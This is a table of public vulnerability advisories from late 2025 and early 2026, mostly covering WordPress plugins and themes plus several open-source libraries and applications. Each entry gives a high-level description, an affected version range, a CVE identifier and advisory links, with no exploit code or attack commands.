| xenioushk--BWL Pro Voting Manager | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in xenioushk BWL Pro Voting Manager bwl-pro-voting-manager allows Blind SQL Injection.This issue affects BWL Pro Voting Manager: from n/a through <= 1.4.9. | 2025-12-30 | not yet calculated | CVE-2025-68990 | https://vdp.patchstack.com/database/Wordpress/Plugin/bwl-pro-voting-manager/vulnerability/wordpress-bwl-pro-voting-manager-plugin-1-4-9-sql-injection-vulnerability?_s_id=cve |
| xenioushk--BWL Pro Voting Manager | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in xenioushk BWL Pro Voting Manager bwl-pro-voting-manager allows DOM-Based XSS.This issue affects BWL Pro Voting Manager: from n/a through <= 1.4.9. | 2025-12-30 | not yet calculated | CVE-2025-68991 | https://vdp.patchstack.com/database/Wordpress/Plugin/bwl-pro-voting-manager/vulnerability/wordpress-bwl-pro-voting-manager-plugin-1-4-9-cross-site-scripting-xss-vulnerability?_s_id=cve |
| xenioushk--BWL Knowledge Base Manager | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in xenioushk BWL Knowledge Base Manager bwl-kb-manager allows Stored XSS.This issue affects BWL Knowledge Base Manager: from n/a through <= 1.6.3. | 2025-12-30 | not yet calculated | CVE-2025-68992 | https://vdp.patchstack.com/database/Wordpress/Plugin/bwl-kb-manager/vulnerability/wordpress-bwl-knowledge-base-manager-plugin-1-6-3-cross-site-scripting-xss-vulnerability?_s_id=cve |
| XforWooCommerce--Share, Print and PDF Products for WooCommerce | Missing Authorization vulnerability in XforWooCommerce Share, Print and PDF Products for WooCommerce share-print-pdf-woocommerce allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Share, Print and PDF Products for WooCommerce: from n/a through <= 3.1.2. | 2025-12-30 | not yet calculated | CVE-2025-68993 | https://vdp.patchstack.com/database/Wordpress/Plugin/share-print-pdf-woocommerce/vulnerability/wordpress-share-print-and-pdf-products-for-woocommerce-plugin-3-1-2-broken-access-control-vulnerability?_s_id=cve |
| XforWooCommerce--Product Loops for WooCommerce | Missing Authorization vulnerability in XforWooCommerce Product Loops for WooCommerce product-loops allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Product Loops for WooCommerce: from n/a through <= 2.1.2. | 2025-12-30 | not yet calculated | CVE-2025-68994 | https://vdp.patchstack.com/database/Wordpress/Plugin/product-loops/vulnerability/wordpress-product-loops-for-woocommerce-plugin-2-1-2-broken-access-control-vulnerability?_s_id=cve |
| Gal Dubinski--My Sticky Elements | Missing Authorization vulnerability in Gal Dubinski My Sticky Elements mystickyelements allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects My Sticky Elements: from n/a through <= 2.3.3. | 2025-12-30 | not yet calculated | CVE-2025-68995 | https://vdp.patchstack.com/database/Wordpress/Plugin/mystickyelements/vulnerability/wordpress-my-sticky-elements-plugin-2-3-3-broken-access-control-vulnerability?_s_id=cve |
| WebCodingPlace--Responsive Posts Carousel Pro | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in WebCodingPlace Responsive Posts Carousel Pro responsive-posts-carousel-pro allows PHP Local File Inclusion.This issue affects Responsive Posts Carousel Pro: from n/a through <= 15.1. | 2025-12-30 | not yet calculated | CVE-2025-68996 | https://vdp.patchstack.com/database/Wordpress/Plugin/responsive-posts-carousel-pro/vulnerability/wordpress-responsive-posts-carousel-pro-plugin-15-1-local-file-inclusion-vulnerability?_s_id=cve |
| AdvancedCoding--wpDiscuz | Authorization Bypass Through User-Controlled Key vulnerability in AdvancedCoding wpDiscuz wpdiscuz allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects wpDiscuz: from n/a through <= 7.6.40. | 2025-12-30 | not yet calculated | CVE-2025-68997 | https://vdp.patchstack.com/database/Wordpress/Plugin/wpdiscuz/vulnerability/wordpress-wpdiscuz-plugin-7-6-40-insecure-direct-object-references-idor-vulnerability?_s_id=cve |
| Heateor Support--Heateor Social Login | Cross-Site Request Forgery (CSRF) vulnerability in Heateor Support Heateor Social Login heateor-social-login allows Cross Site Request Forgery.This issue affects Heateor Social Login: from n/a through <= 1.1.39. | 2025-12-30 | not yet calculated | CVE-2025-68998 | https://vdp.patchstack.com/database/Wordpress/Plugin/heateor-social-login/vulnerability/wordpress-heateor-social-login-plugin-1-1-39-cross-site-request-forgery-csrf-vulnerability?_s_id=cve |
| Atte Moisio--AM Events | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Atte Moisio AM Events am-events allows Stored XSS.This issue affects AM Events: from n/a through <= 1.13.1. | 2025-12-30 | not yet calculated | CVE-2025-69006 | https://vdp.patchstack.com/database/Wordpress/Plugin/am-events/vulnerability/wordpress-am-events-plugin-1-13-1-cross-site-scripting-xss-vulnerability?_s_id=cve |
| OTWthemes--Popping Sidebars and Widgets Light | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in OTWthemes Popping Sidebars and Widgets Light popping-sidebars-and-widgets-light allows Stored XSS.This issue affects Popping Sidebars and Widgets Light: from n/a through <= 1.27. | 2025-12-30 | not yet calculated | CVE-2025-69007 | https://vdp.patchstack.com/database/Wordpress/Plugin/popping-sidebars-and-widgets-light/vulnerability/wordpress-popping-sidebars-and-widgets-light-plugin-1-27-cross-site-scripting-xss-vulnerability?_s_id=cve |
| Inboxify--Inboxify Sign Up Form | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Inboxify Inboxify Sign Up Form inboxify-sign-up-form allows Stored XSS.This issue affects Inboxify Sign Up Form: from n/a through <= 1.0.4. | 2025-12-30 | not yet calculated | CVE-2025-69008 | https://vdp.patchstack.com/database/Wordpress/Plugin/inboxify-sign-up-form/vulnerability/wordpress-inboxify-sign-up-form-plugin-1-0-4-cross-site-scripting-xss-vulnerability?_s_id=cve |
| kamleshyadav--Medicalequipment | Missing Authorization vulnerability in kamleshyadav Medicalequipment medicalequipment allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Medicalequipment: from n/a through <= 1.0.9. | 2025-12-30 | not yet calculated | CVE-2025-69009 | https://vdp.patchstack.com/database/Wordpress/Theme/medicalequipment/vulnerability/wordpress-medicalequipment-theme-1-0-9-broken-access-control-vulnerability?_s_id=cve |
| themebeez--Themebeez Toolkit | Missing Authorization vulnerability in themebeez Themebeez Toolkit themebeez-toolkit allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Themebeez Toolkit: from n/a through <= 1.3.5. | 2025-12-30 | not yet calculated | CVE-2025-69010 | https://vdp.patchstack.com/database/Wordpress/Plugin/themebeez-toolkit/vulnerability/wordpress-themebeez-toolkit-plugin-1-3-5-broken-access-control-vulnerability?_s_id=cve |
| Stephen Harris--Event Organiser | Missing Authorization vulnerability in Stephen Harris Event Organiser event-organiser allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Event Organiser: from n/a through <= 3.12.8. | 2025-12-30 | not yet calculated | CVE-2025-69012 | https://vdp.patchstack.com/database/Wordpress/Plugin/event-organiser/vulnerability/wordpress-event-organiser-plugin-3-12-8-broken-access-control-vulnerability?_s_id=cve |
| jetmonsters--Stratum | Missing Authorization vulnerability in jetmonsters Stratum stratum allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Stratum: from n/a through <= 1.6.1. | 2025-12-30 | not yet calculated | CVE-2025-69013 | https://vdp.patchstack.com/database/Wordpress/Plugin/stratum/vulnerability/wordpress-stratum-plugin-1-6-1-broken-access-control-vulnerability?_s_id=cve |
| Youzify--Youzify | Server-Side Request Forgery (SSRF) vulnerability in Youzify Youzify youzify allows Server Side Request Forgery.This issue affects Youzify: from n/a through <= 1.3.5. | 2025-12-30 | not yet calculated | CVE-2025-69014 | https://vdp.patchstack.com/database/Wordpress/Plugin/youzify/vulnerability/wordpress-youzify-plugin-1-3-5-server-side-request-forgery-ssrf-vulnerability?_s_id=cve |
| Automattic--Crowdsignal Forms | Missing Authorization vulnerability in Automattic Crowdsignal Forms crowdsignal-forms allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Crowdsignal Forms: from n/a through <= 1.7.2. | 2025-12-30 | not yet calculated | CVE-2025-69015 | https://vdp.patchstack.com/database/Wordpress/Plugin/crowdsignal-forms/vulnerability/wordpress-crowdsignal-forms-plugin-1-7-2-broken-access-control-vulnerability?_s_id=cve |
| averta--Shortcodes and extra features for Phlox theme | Missing Authorization vulnerability in averta Shortcodes and extra features for Phlox theme auxin-elements allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Shortcodes and extra features for Phlox theme: from n/a through <= 2.17.12. | 2025-12-30 | not yet calculated | CVE-2025-69016 | https://vdp.patchstack.com/database/Wordpress/Plugin/auxin-elements/vulnerability/wordpress-shortcodes-and-extra-features-for-phlox-theme-plugin-2-17-12-broken-access-control-vulnerability?_s_id=cve |
| Magnigenie--RestroPress | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Magnigenie RestroPress restropress allows Stored XSS.This issue affects RestroPress: from n/a through <= 3.2.4.2. | 2025-12-30 | not yet calculated | CVE-2025-69017 | https://vdp.patchstack.com/database/Wordpress/Plugin/restropress/vulnerability/wordpress-restropress-plugin-3-2-4-2-cross-site-scripting-xss-vulnerability?_s_id=cve |
| Shamalli--Web Directory Free | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Shamalli Web Directory Free web-directory-free allows DOM-Based XSS.This issue affects Web Directory Free: from n/a through <= 1.7.12. | 2025-12-30 | not yet calculated | CVE-2025-69018 | https://vdp.patchstack.com/database/Wordpress/Plugin/web-directory-free/vulnerability/wordpress-web-directory-free-plugin-1-7-12-cross-site-scripting-xss-vulnerability?_s_id=cve |
| FlippingBook--FlippingBook | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in FlippingBook FlippingBook flippingbook allows DOM-Based XSS.This issue affects FlippingBook: from n/a through <= 2.0.1. | 2025-12-30 | not yet calculated | CVE-2025-69019 | https://vdp.patchstack.com/database/Wordpress/Plugin/flippingbook/vulnerability/wordpress-flippingbook-plugin-2-0-1-cross-site-scripting-xss-vulnerability?_s_id=cve |
| Tribulant Software--Newsletters | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Tribulant Software Newsletters newsletters-lite allows Stored XSS.This issue affects Newsletters: from n/a through <= 4.12. | 2025-12-30 | not yet calculated | CVE-2025-69020 | https://vdp.patchstack.com/database/Wordpress/Plugin/newsletters-lite/vulnerability/wordpress-newsletters-plugin-4-12-cross-site-scripting-xss-vulnerability?_s_id=cve |
| Ays Pro--Popup box | Cross-Site Request Forgery (CSRF) vulnerability in Ays Pro Popup box ays-popup-box allows Cross Site Request Forgery.This issue affects Popup box: from n/a through <= 6.0.7. | 2025-12-30 | not yet calculated | CVE-2025-69021 | https://vdp.patchstack.com/database/Wordpress/Plugin/ays-popup-box/vulnerability/wordpress-popup-box-plugin-6-0-7-cross-site-request-forgery-csrf-vulnerability?_s_id=cve |
| Weblizar - WordPress Themes & Plugin--HR Management Lite | Missing Authorization vulnerability in Weblizar - WordPress Themes & Plugin HR Management Lite hr-management-lite allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects HR Management Lite: from n/a through <= 3.5. | 2025-12-30 | not yet calculated | CVE-2025-69022 | https://vdp.patchstack.com/database/Wordpress/Plugin/hr-management-lite/vulnerability/wordpress-hr-management-lite-plugin-3-5-broken-access-control-vulnerability?_s_id=cve |
| Marketing Fire--Discussion Board | Missing Authorization vulnerability in Marketing Fire Discussion Board wp-discussion-board allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Discussion Board: from n/a through <= 2.5.7. | 2025-12-30 | not yet calculated | CVE-2025-69023 | https://vdp.patchstack.com/database/Wordpress/Plugin/wp-discussion-board/vulnerability/wordpress-discussion-board-plugin-2-5-7-broken-access-control-vulnerability?_s_id=cve |
| bizswoop--BizPrint | Missing Authorization vulnerability in bizswoop BizPrint print-google-cloud-print-gcp-woocommerce allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects BizPrint: from n/a through <= 4.6.7. | 2025-12-30 | not yet calculated | CVE-2025-69024 | https://vdp.patchstack.com/database/Wordpress/Plugin/print-google-cloud-print-gcp-woocommerce/vulnerability/wordpress-bizprint-plugin-4-6-7-broken-access-control-vulnerability?_s_id=cve |
| Aethonic--Poptics: AI-Powered Popup Builder for Lead Generation, Conversions, Exit-Intent, Email Opt-ins & WooCommerce Sales | Exposure of Sensitive System Information to an Unauthorized Control Sphere vulnerability in Aethonic Poptics: AI-Powered Popup Builder for Lead Generation, Conversions, Exit-Intent, Email Opt-ins & WooCommerce Sales poptics allows Retrieve Embedded Sensitive Data.This issue affects Poptics: AI-Powered Popup Builder for Lead Generation, Conversions, Exit-Intent, Email Opt-ins & WooCommerce Sales: from n/a through <= 1.0.20. | 2025-12-30 | not yet calculated | CVE-2025-69025 | https://vdp.patchstack.com/database/Wordpress/Plugin/poptics/vulnerability/wordpress-poptics-ai-powered-popup-builder-for-lead-generation-conversions-exit-intent-email-opt-ins-woocommerce-sales-plugin-1-0-20-sensitive-data-exposure-vulnerability?_s_id=cve |
| Roxnor--PopupKit | Exposure of Sensitive System Information to an Unauthorized Control Sphere vulnerability in Roxnor PopupKit popup-builder-block allows Retrieve Embedded Sensitive Data.This issue affects PopupKit: from n/a through <= 2.1.5. | 2025-12-30 | not yet calculated | CVE-2025-69026 | https://vdp.patchstack.com/database/Wordpress/Plugin/popup-builder-block/vulnerability/wordpress-popupkit-plugin-2-1-5-sensitive-data-exposure-vulnerability?_s_id=cve |
| tychesoftwares--Product Delivery Date for WooCommerce Lite | Missing Authorization vulnerability in tychesoftwares Product Delivery Date for WooCommerce - Lite product-delivery-date-for-woocommerce-lite allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Product Delivery Date for WooCommerce - Lite: from n/a through <= 3.2.0. | 2025-12-30 | not yet calculated | CVE-2025-69027 | https://vdp.patchstack.com/database/Wordpress/Plugin/product-delivery-date-for-woocommerce-lite/vulnerability/wordpress-product-delivery-date-for-woocommerce-lite-plugin-3-2-0-broken-access-control-vulnerability?_s_id=cve |
| BoldGrid--weForms | Missing Authorization vulnerability in BoldGrid weForms weforms allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects weForms: from n/a through <= 1.6.25. | 2025-12-30 | not yet calculated | CVE-2025-69028 | https://vdp.patchstack.com/database/Wordpress/Plugin/weforms/vulnerability/wordpress-weforms-plugin-1-6-25-broken-access-control-vulnerability?_s_id=cve |
| Select-Themes--Struktur | Authorization Bypass Through User-Controlled Key vulnerability in Select-Themes Struktur struktur allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Struktur: from n/a through <= 2.5.1. | 2025-12-30 | not yet calculated | CVE-2025-69029 | https://vdp.patchstack.com/database/Wordpress/Theme/struktur/vulnerability/wordpress-struktur-theme-2-5-1-insecure-direct-object-references-idor-vulnerability?_s_id=cve |
| Mikado-Themes--Backpack Traveler | Authorization Bypass Through User-Controlled Key vulnerability in Mikado-Themes Backpack Traveler backpacktraveler allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Backpack Traveler: from n/a through <= 2.10.3. | 2025-12-30 | not yet calculated | CVE-2025-69030 | https://vdp.patchstack.com/database/Wordpress/Theme/backpacktraveler/vulnerability/wordpress-backpack-traveler-theme-2-10-3-insecure-direct-object-references-idor-vulnerability?_s_id=cve |
| Skywarrior--Arcane | Missing Authorization vulnerability in Skywarrior Arcane arcane allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Arcane: from n/a through <= 3.6.6. | 2025-12-30 | not yet calculated | CVE-2025-69031 | https://vdp.patchstack.com/database/Wordpress/Theme/arcane/vulnerability/wordpress-arcane-theme-3-6-6-broken-access-control-vulnerability?_s_id=cve |
| Mikado-Themes--FiveStar | Authorization Bypass Through User-Controlled Key vulnerability in Mikado-Themes FiveStar fivestar allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects FiveStar: from n/a through <= 1.7. | 2025-12-30 | not yet calculated | CVE-2025-69032 | https://vdp.patchstack.com/database/Wordpress/Theme/fivestar/vulnerability/wordpress-fivestar-theme-1-7-insecure-direct-object-references-idor-vulnerability?_s_id=cve |
| A WP Life--Blog Filter | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in A WP Life Blog Filter blog-filter allows DOM-Based XSS.This issue affects Blog Filter: from n/a through <= 1.7.3. | 2025-12-30 | not yet calculated | CVE-2025-69033 | https://vdp.patchstack.com/database/Wordpress/Plugin/blog-filter/vulnerability/wordpress-blog-filter-plugin-1-7-3-cross-site-scripting-xss-vulnerability?_s_id=cve |
| Mikado-Themes--Lekker | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in Mikado-Themes Lekker lekker allows PHP Local File Inclusion.This issue affects Lekker: from n/a through <= 1.8. | 2025-12-30 | not yet calculated | CVE-2025-69034 | https://vdp.patchstack.com/database/Wordpress/Theme/lekker/vulnerability/wordpress-lekker-theme-1-8-local-file-inclusion-vulnerability?_s_id=cve |
| Vidish--Combo Offers WooCommerce | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Vidish Combo Offers WooCommerce woo-combo-offers allows DOM-Based XSS.This issue affects Combo Offers WooCommerce: from n/a through <= 4.2. | 2025-12-30 | not yet calculated | CVE-2025-69088 | https://vdp.patchstack.com/database/Wordpress/Plugin/woo-combo-offers/vulnerability/wordpress-combo-offers-woocommerce-plugin-4-2-cross-site-scripting-xss-vulnerability?_s_id=cve |
| autolistings--Auto Listings | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in autolistings Auto Listings auto-listings allows Stored XSS.This issue affects Auto Listings: from n/a through <= 2.7.1. | 2025-12-30 | not yet calculated | CVE-2025-69089 | https://vdp.patchstack.com/database/Wordpress/Plugin/auto-listings/vulnerability/wordpress-auto-listings-plugin-2-7-1-cross-site-scripting-xss-vulnerability?_s_id=cve |
| Kraft Plugins--Demo Importer Plus | Missing Authorization vulnerability in Kraft Plugins Demo Importer Plus demo-importer-plus allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Demo Importer Plus: from n/a through <= 2.0.8. | 2025-12-30 | not yet calculated | CVE-2025-69091 | https://vdp.patchstack.com/database/Wordpress/Plugin/demo-importer-plus/vulnerability/wordpress-demo-importer-plus-plugin-2-0-8-broken-access-control-vulnerability?_s_id=cve |
| WPDeveloper--Essential Addons for Elementor | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in WPDeveloper Essential Addons for Elementor essential-addons-for-elementor-lite allows DOM-Based XSS.This issue affects Essential Addons for Elementor: from n/a through <= 6.5.3. | 2025-12-30 | not yet calculated | CVE-2025-69092 | https://vdp.patchstack.com/database/Wordpress/Plugin/essential-addons-for-elementor-lite/vulnerability/wordpress-essential-addons-for-elementor-plugin-6-5-3-cross-site-scripting-xss-vulnerability?_s_id=cve |
| wpdesk--ShopMagic | Missing Authorization vulnerability in wpdesk ShopMagic shopmagic-for-woocommerce allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects ShopMagic: from n/a through <= 4.7.2. | 2025-12-30 | not yet calculated | CVE-2025-69093 | https://vdp.patchstack.com/database/Wordpress/Plugin/shopmagic-for-woocommerce/vulnerability/wordpress-shopmagic-plugin-4-7-2-broken-access-control-vulnerability?_s_id=cve |
| Quenary--tugtainer | Tugtainer is a self-hosted app for automating updates of docker containers. In versions prior to 1.15.1, arbitrary arguments can be injected in tugtainer-agent `POST api/command/run`. Version 1.15.1 fixes the issue. | 2025-12-29 | not yet calculated | CVE-2025-69201 | https://github.com/Quenary/tugtainer/security/advisories/GHSA-grc3-8w5x-g54q https://github.com/Quenary/tugtainer/pull/88 https://github.com/Quenary/tugtainer/commit/dbb17d843e30fd7509acf0328c913dcb42f40831 https://github.com/Quenary/tugtainer/releases/tag/v1.15.1 |
| arthurfiorette--axios-cache-interceptor | Axios Cache Interceptor is a cache interceptor for axios. Prior to version 1.11.1, when a server calls an upstream service using different auth tokens, axios-cache-interceptor returns incorrect cached responses, leading to authorization bypass. The cache key is generated only from the URL, ignoring request headers like `Authorization`. When the server responds with `Vary: Authorization` (indicating the response varies by auth token), the library ignores this, causing all requests to share the same cache regardless of authorization. Affected are server-side applications (APIs, proxies, backend services) that use axios-cache-interceptor to cache requests to upstream services, handle requests from multiple users with different auth tokens, and call upstream services that rely on `Vary` to differentiate caches. Browser/client-side applications (single user per browser session) are not affected. Services using different auth tokens to call upstream services will return incorrect cached data, bypassing authorization checks and leaking user data across different authenticated sessions. As of `v1.11.1`, automatic `Vary` header support is enabled by default: when the server responds with `Vary: Authorization`, cache keys include the authorization header value, so each user gets their own cache. | 2025-12-29 | not yet calculated | CVE-2025-69202 | https://github.com/arthurfiorette/axios-cache-interceptor/security/advisories/GHSA-x4m5-4cw8-vc44 https://github.com/arthurfiorette/axios-cache-interceptor/commit/49a808059dfc081b9cc23d48f243d55dfce15f01 |
| NeoRazorX--facturascripts | FacturaScripts is open-source enterprise resource planning and accounting software. Prior to version 2025.7, a stored cross-site scripting (XSS) vulnerability exists in the product file upload functionality. Authenticated users can upload crafted XML files containing executable JavaScript. These files are later rendered by the application without sufficient sanitization or content-type enforcement, allowing arbitrary JavaScript execution when the file is accessed. Because product files uploaded by regular users are visible to administrative users, this vulnerability can be leveraged to execute malicious JavaScript in an administrator's browser session. Version 2025.7 fixes the issue. | 2025-12-30 | not yet calculated | CVE-2025-69210 | https://github.com/NeoRazorX/facturascripts/security/advisories/GHSA-2267-xqcf-gw2m https://facturascripts.com/publicaciones/ya-disponible-facturascripts-2025-7 https://github.com/NeoRazorX/facturascripts/releases/tag/v2025.7 |
| nestjs--nest | Nest is a framework for building scalable Node.js server-side applications. Versions prior to 11.1.11 have a Fastify URL encoding middleware bypass. A NestJS application is vulnerable if it uses `@nestjs/platform-fastify`; relies on `NestMiddleware` (via `MiddlewareConsumer`) for security checks (authentication, authorization, etc.), or through `app.use()`; and applies middleware to specific routes using string paths or controllers (e.g., `.forRoutes('admin')`). Exploitation can result in unauthenticated users accessing protected routes, restricted administrative endpoints becoming accessible to lower-privileged users, and/or middleware performing sanitization or validation being skipped. This issue is patched in `@nestjs/platform-fastify@11.1.11`. | 2025-12-29 | not yet calculated | CVE-2025-69211 | https://github.com/nestjs/nest/security/advisories/GHSA-8wpr-639p-ccrj https://github.com/nestjs/nest/commit/c4cedda15a05aafec1e6045b36b0335ab850e771 |
| NAVER--NAVER Whale browser | Whale browser before 4.35.351.12 allows an attacker to escape the iframe sandbox in a sidebar environment. | 2025-12-30 | not yet calculated | CVE-2025-69234 | https://cve.naver.com/detail/cve-2025-69234.html |
| NAVER--NAVER Whale browser | Whale browser before 4.35.351.12 allows an attacker to bypass the Same-Origin Policy in a sidebar environment. | 2025-12-30 | not yet calculated | CVE-2025-69235 | https://cve.naver.com/detail/cve-2025-69235.html |
| WasmEdge--WasmEdge | WasmEdge is a WebAssembly runtime. Prior to version 0.16.0-alpha.3, a multiplication in `WasmEdge/include/runtime/instance/memory.h` can wrap, causing `checkAccessBound()` to incorrectly allow the access. This leads to a segmentation fault. Version 0.16.0-alpha.3 contains a patch for the issue. | 2025-12-30 | not yet calculated | CVE-2025-69261 | https://github.com/WasmEdge/WasmEdge/security/advisories/GHSA-89fm-8mr7-gg4m https://github.com/WasmEdge/WasmEdge/commit/37cc9fa19bd23edbbdaa9252059b17f191fa4d17 |
| infiniflow--ragflow | RAGFlow is an open-source RAG (Retrieval-Augmented Generation) engine. In versions prior to 0.22.0, the use of an insecure key generation algorithm in the API key and beta (assistant/agent share auth) token generation process allows these tokens to be mutually derivable. Specifically, both tokens are generated using the same `URLSafeTimedSerializer` with predictable inputs, enabling an unauthorized user who obtains the shared assistant/agent URL to derive the personal API key. This grants them full control over the assistant/agent owner's account. Version 0.22.0 fixes the issue. | 2025-12-31 | not yet calculated | CVE-2025-69286 | https://github.com/infiniflow/ragflow/security/advisories/GHSA-9j5g-g4xm-57w7 https://github.com/infiniflow/ragflow/commit/a3bb4aadcc3494fb27f2a9933b4c46df8eb532e6 https://github.com/infiniflow/ragflow/blob/v0.20.5/api/apps/system_app.py#L214-L215 https://github.com/infiniflow/ragflow/blob/v0.20.5/api/utils/__init__.py#L343 https://github.com/infiniflow/ragflow/blob/v0.20.5/api/utils/api_utils.py#L378 |
| QNAP Systems Inc.--QTS | An exposure of sensitive system information to an unauthorized control sphere vulnerability has been reported to affect several QNAP operating system versions. Remote attackers can exploit the vulnerability to read application data. We have already fixed the vulnerability in the following versions: QTS 5.2.8.3332 build 20251128 and later; QuTS hero h5.2.8.3321 build 20251117 and later; QuTS hero h5.3.1.3250 build 20250912 and later. | 2026-01-02 | not yet calculated | CVE-2025-9110 | https://www.qnap.com/en/security-advisory/qsa-25-51 |
| yhirose--cpp-httplib | cpp-httplib is a C++11 single-file header-only cross platform HTTP/HTTPS library. Prior to version 0.30.0, the `write_headers` function does not check for CR and LF characters in user-supplied headers, allowing an untrusted header value to escape its header line. This vulnerability allows attackers to add extra headers, modify the request body unexpectedly, and trigger an SSRF attack. When combined with a server that supports HTTP/1.1 pipelining (Spring Boot, Python Twisted, etc.), this can be used for server-side request forgery (SSRF). Version 0.30.0 fixes this issue. | 2026-01-01 | not yet calculated | CVE-2026-21428 | https://github.com/yhirose/cpp-httplib/security/advisories/GHSA-wpc6-j37r-jcx7 https://github.com/yhirose/cpp-httplib/commit/98048a033a532ff22320ce1d11789f8d5710dfcd https://github.com/yhirose/cpp-httplib/releases/tag/v0.30.0 |
| emlog--emlog | Emlog is an open source website building system. In version 2.5.23, the admin can set controls that make users unable to edit or delete their articles after publishing them. As of time of publication, no known patched versions are available. | 2026-01-02 | not yet calculated | CVE-2026-21429 | https://github.com/emlog/emlog/security/advisories/GHSA-jw5v-2g53-rx8w |
| emlog--emlog | Emlog is an open source website building system. In version 2.5.23, article creation functionality is vulnerable to cross-site request forgery (CSRF). This can lead to a user being forced to post an article with arbitrary, attacker-controlled content. This, when combined with stored cross-site scripting, leads to account takeover. As of time of publication, no known patched versions are available. | 2026-01-02 | not yet calculated | CVE-2026-21430 | https://github.com/emlog/emlog/security/advisories/GHSA-2g2w-vmg7-pq4q |
| emlog--emlog | Emlog is an open source website building system. Version 2.5.23 has a stored cross-site scripting vulnerability in the `Resource media library ` function while publishing an article. As of time of publication, no known patched versions are available. | 2026-01-02 | not yet calculated | CVE-2026-21431 | https://github.com/emlog/emlog/security/advisories/GHSA-9vc2-crhr-248x |
| emlog--emlog | Emlog is an open source website building system. Version 2.5.23 has a stored cross-site scripting vulnerability that can lead to account takeover, including takeover of admin accounts. As of time of publication, no known patched versions are available. | 2026-01-02 | not yet calculated | CVE-2026-21432 | https://github.com/emlog/emlog/security/advisories/GHSA-4rxf-mjqx-c464 |
| getsolus--eopkg | eopkg is a Solus package manager implemented in python3. In versions prior to 4.4.0, a malicious package could escape the directory set by `--destdir`. This requires the installation of a package from a malicious or compromised source. Files in such packages would not be installed in the path given by `--destdir`, but on a different location on the host. The issue has been fixed in v4.4.0. Users only installing packages from the Solus repositories are not affected. | 2026-01-01 | not yet calculated | CVE-2026-21436 | https://github.com/getsolus/eopkg/security/advisories/GHSA-786v-47cq-qm6m https://github.com/getsolus/eopkg/pull/201 https://github.com/getsolus/eopkg/commit/e7694323ed64e08b5b4b108fff273c64125cd39d https://github.com/getsolus/eopkg/releases/tag/v4.4.0 |
| getsolus--eopkg | eopkg is a Solus package manager implemented in python3. In versions prior to 4.4.0, a malicious package could include files that are not tracked by `eopkg`. This requires the installation of a package from a malicious or compromised source. Files in such packages would not be shown by `lseopkg` and related tools. The issue has been fixed in v4.4.0. Users only installing packages from the Solus repositories are not affected. | 2026-01-01 | not yet calculated | CVE-2026-21437 | https://github.com/getsolus/eopkg/security/advisories/GHSA-hjp7-qwrj-6cc6 https://github.com/getsolus/eopkg/pull/201 https://github.com/getsolus/eopkg/commit/e7694323ed64e08b5b4b108fff273c64125cd39d https://github.com/getsolus/eopkg/releases/tag/v4.4.0 |
| adonisjs--core | AdonisJS is a TypeScript-first web framework. A Path Traversal vulnerability in AdonisJS multipart file handling may allow a remote attacker to write arbitrary files to arbitrary locations on the server filesystem. This impacts @adonisjs/bodyparser through version 10.1.1 and 11.x prerelease versions prior to 11.0.0-next.6. This issue has been patched in @adonisjs/bodyparser versions 10.1.2 and 11.0.0-next.6. | 2026-01-02 | not yet calculated | CVE-2026-21440 | https://github.com/adonisjs/core/security/advisories/GHSA-gvq6-hvvp-h34h https://github.com/adonisjs/bodyparser/commit/143a16f35602be8561215611582211dec280cae6 https://github.com/adonisjs/bodyparser/commit/6795c0e3fa824ae275bbd992aae60609e96f0f03 https://github.com/adonisjs/bodyparser/releases/tag/v10.1.2 https://github.com/adonisjs/bodyparser/releases/tag/v11.0.0-next.6 |
| langflow-ai--langflow | Langflow is a tool for building and deploying AI-powered agents and workflows. Prior to version 1.7.0.dev45, multiple critical API endpoints in Langflow are missing authentication controls. The issue allows any unauthenticated user to access sensitive user conversation data, transaction histories, and perform destructive operations including message deletion. This affects endpoints handling personal data and system operations that should require proper authorization. Version 1.7.0.dev45 contains a patch. | 2026-01-02 | not yet calculated | CVE-2026-21445 | https://github.com/langflow-ai/langflow/security/advisories/GHSA-c5cp-vx83-jhqx https://github.com/langflow-ai/langflow/commit/3fed9fe1b5658f2c8656dbd73508e113a96e486a |
